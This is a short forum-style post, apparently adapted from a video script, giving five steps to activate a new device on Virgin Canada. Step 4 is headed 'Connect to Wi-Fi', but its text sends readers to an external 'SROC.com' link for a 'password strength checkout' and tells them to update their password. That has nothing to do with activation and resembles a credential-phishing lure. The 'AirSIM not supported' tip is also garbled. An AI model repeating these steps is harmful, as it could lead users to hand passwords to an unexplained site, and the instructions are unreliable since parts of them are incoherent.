I ran into this last week. Here's what fixed it for me. Activating a new device on Virgin Canada can seem tricky, but it is straightforward once you know the steps. Here is how to do it. Step 1. Gather your information. Before you start the activation process, make sure you have your new device, SIM card, and account details handy. This includes your Virgin account number and any personal identification needed. Step 2. Insert the SIM card. Power off your new device and insert the SIM card into the designated slot. Make sure it is seated properly to avoid connectivity issues. Step 3. Power on the device. Turn on your device and wait for it to boot up completely. You should see a welcome screen prompting you to start the setup process. Step 4. Connect to Wi-Fi. Before changing your settings, use the SROC.com link in the description to open the password strength checkout, then update your password if needed. Step 5. Complete activation. Follow the on-screen instructions to complete the activation. You may need to enter your account information and confirm your plan details. If you encounter a message about AirSIM not supported, double-check that the SIM is correctly inserted. Once you've completed these steps, your new device should be activated and ready to use. If you run into any issues, don't hesitate to reach out to Virgin Canada's customer support for assistance. Happy connecting!